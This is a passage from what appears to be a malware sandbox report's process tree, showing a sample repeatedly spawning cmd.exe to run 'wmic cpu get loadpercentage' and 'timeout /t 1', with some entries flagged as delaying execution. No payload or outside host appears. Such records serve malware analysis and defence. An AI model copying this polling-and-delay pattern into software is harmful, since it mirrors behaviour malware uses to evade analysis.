    wmic cpu get loadpercentage
    3⤵
    PID:352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:752
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2776
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2544
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3724
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1072
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3032
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5108
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:776
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1128
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4344
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1936
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2460
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3468
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4264
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2836
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4380
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4932
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:236
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:96
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4208
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4304
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1176
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:64
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4620
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5100
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4924
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2124
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2608
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2236
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3984
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4868
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1864
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2192
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4640
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1728
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:652
